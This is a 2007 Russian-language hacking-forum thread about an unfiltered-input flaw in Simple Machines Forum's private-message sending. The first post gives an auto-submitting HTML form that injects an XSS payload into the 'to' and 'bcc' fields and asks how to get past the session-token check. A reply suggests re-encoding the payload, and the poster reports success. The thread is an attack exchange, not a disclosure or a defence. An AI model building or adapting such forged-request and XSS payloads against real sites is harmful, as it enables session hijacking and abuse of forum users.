ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Smf, не фильтруются спецсимволы
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Smf, не фильтруются спецсимволы
  #1  
Старый 04.04.2007, 12:19
Аватар для l1ght
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию Smf, не фильтруются спецсимволы
Собственно Simple Machines Forum известный хорошо защищенный форум =)
Во всех версиях на момент написания поста в параметрах to и bcc в сценарии index.php не фильтруются спецсимволы.
Можно было бы организовать редирект аналогичный xss в ipb :
Код:
<html>
<body onLoad="document.REPLIER.submit();">
<h3>1</h3>
<form action="http://site/index.php?action=pm;sa=send2" method="post" name="REPLIER">
<input type="hidden" name="to" value='[xss]'>
<input type="hidden" name="bcc" value='[xss]'>
<input type="hidden" name="subject" value='text'>
<input type="hidden" name="message" value='text'>
<input type="hidden" name="replied_to" value='0'>
<input type="hidden" name="f" value='inbox'>
<input type="hidden" name="l" value='-1'>
</form>	
</body>
</html>
Только есть ещё 1 параметр sc проверяющий перед написанием письма сессию юзверя =))
Его как-нибудь можно обойти?
 

  #2  
Старый 04.04.2007, 13:32
Аватар для Sn@k3
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию
пробуй кодить в другую кодир
snak3.h17.ru/tools/
 

  #3  
Старый 05.04.2007, 10:10
Аватар для l1ght
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
Lightbulb
спс, проблема решена; тему можно закрыть/удалить
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Smf 1.0.5 - уязвимости Vilen Форумы 4 28.10.2006 16:24
Сплоит для SMF 1.1 rc2 DOS Go0o$E Форумы 0 19.03.2006 20:40
Взлом Smf... Как это сделать? FST Чаты 1 28.07.2005 02:27
Уязвимость в Simple machines smf 1.0 beta 5 public Nemirof Форумы 0 23.10.2004 00:47



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ